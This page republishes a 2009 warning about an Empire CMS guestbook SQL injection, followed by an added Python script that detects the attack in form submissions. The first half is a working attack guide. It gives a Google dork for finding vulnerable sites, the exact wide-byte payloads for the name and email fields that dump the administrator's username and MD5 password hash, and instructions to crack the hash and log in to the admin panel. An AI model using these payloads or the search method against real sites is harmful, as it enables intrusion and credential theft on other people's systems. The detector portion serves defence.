Empire CMS 0day: high success rate - Vulnerability Warning - Black Bar Safety Net

ID MYHACK58:62200923854
Type myhack58
Reporter Anonymous
Modified 2009-07-13T00:00:00


Find a site that runs Empire CMS and append the following directly to the site address: e/tool/gbook/?bid=1
This opens the Empire CMS guestbook.
In the name field, enter: 缞\
In the contact email field, enter: ,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
After the form is submitted, the account and password are disclosed.

Test method: search Google for the keyword inurl:e/tool/gbook/?bid=1, then leave a message in the manner described above. The displayed result discloses the administrator account and the MD5 value of the password; crack the password and log in to the admin back end.
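
For defenders, the submission described above leaves recognisable traces in the guestbook form fields. The following is an added example (not part of the original advisory and not Empire CMS code) that checks urlencoded form bodies for those traces; the field names name, email and lytext, the GBK charset and the sample records are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlencode

# SQL fragments visible in the payload on the page: a subquery, concat(), the
# phome_enewsuser table, and an unterminated comment closing the field.
SQL_MARKERS = [
    ("subquery", re.compile(r"\(\s*select\b", re.I)),
    ("concat()", re.compile(r"\bconcat\s*\(", re.I)),
    ("user table", re.compile(r"phome_enewsuser", re.I)),
    ("trailing comment", re.compile(r"/\*\s*$")),
]

def inspect_form(body, charset="gbk"):
    """Return {field: [findings]} for one urlencoded guestbook form body."""
    findings = {}
    for field, value in parse_qsl(body, keep_blank_values=True,
                                  encoding=charset, errors="replace"):
        hits = [label for label, rx in SQL_MARKERS if rx.search(value)]
        # A value ending in a backslash can escape the quote that closes it
        # when input is concatenated into an SQL string; the name field on
        # the page ends this way.
        if value.endswith("\\"):
            hits.append("trailing backslash")
        if hits:
            findings[field] = hits
    return findings

def scan(records):
    """records: (client, body) pairs; return only those with findings."""
    return [(client, f) for client, body in records if (f := inspect_form(body))]

# Constructed sample: field names are assumed, the two suspicious values are
# the ones quoted on the page, client addresses are documentation ranges.
SAMPLE = [
    ("192.0.2.10", urlencode({"name": "Li Wei", "email": "liwei@example.com",
                              "lytext": "Nice site, thanks."}, encoding="gbk")),
    ("198.51.100.7", urlencode({
        "name": "缞\\",
        "email": ",1,1,1,(select concat(username,0x5f,password,0x5f,rnd) "
                 "from phome_enewsuser where userid=1),1,1,1,0,0,0)/*",
        "lytext": "test"}, encoding="gbk")),
]

if __name__ == "__main__":
    for client, found in scan(SAMPLE):
        print(client, found)
```

A match on the SQL markers in any guestbook field is the strong signal; the trailing backslash alone can occur in ordinary text and is best treated as supporting context.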